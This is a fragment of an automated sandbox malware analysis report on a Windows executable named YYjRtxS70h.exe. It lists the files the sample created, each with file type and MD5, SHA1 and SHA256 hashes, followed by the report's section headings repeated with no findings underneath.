C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hprqkrgy.vx4.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i51z1tx3.hhq.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ipoksj5s.xzo.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jorhrdbe.jzy.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k4axp5zv.0yg.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nqewxhb2.xo3.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rnrzkanw.2s4.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sbdh2p4l.dal.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vjhfp4k3.uvq.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vuybsjww.poo.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	PE32 executable (GUI) Intel 80386, for MS Windows	F453C5F8C736FF8C381E7022CAD85E3E	1906C904A33B1910B88F2020A7942776AB7AD54E	36A780C3CFCC5162D80BF88A5BA5F1BAC2149C1D6D3A04FF5536DECB31D494AC
\Device\ConDrv	ASCII text, with CRLF, LF line terminators	7123653A9955360E570498978834DC21	10F79C5E7494CCC7C1B52B285B4C6DC2482C7FFC	BA674902E6BB0800509B7688301E4C38D54742809DD6809DD8A3616AE68C0B49

Windows Analysis Report
YYjRtxS70h.exe

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report YYjRtxS70h.exe

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
YYjRtxS70h.exe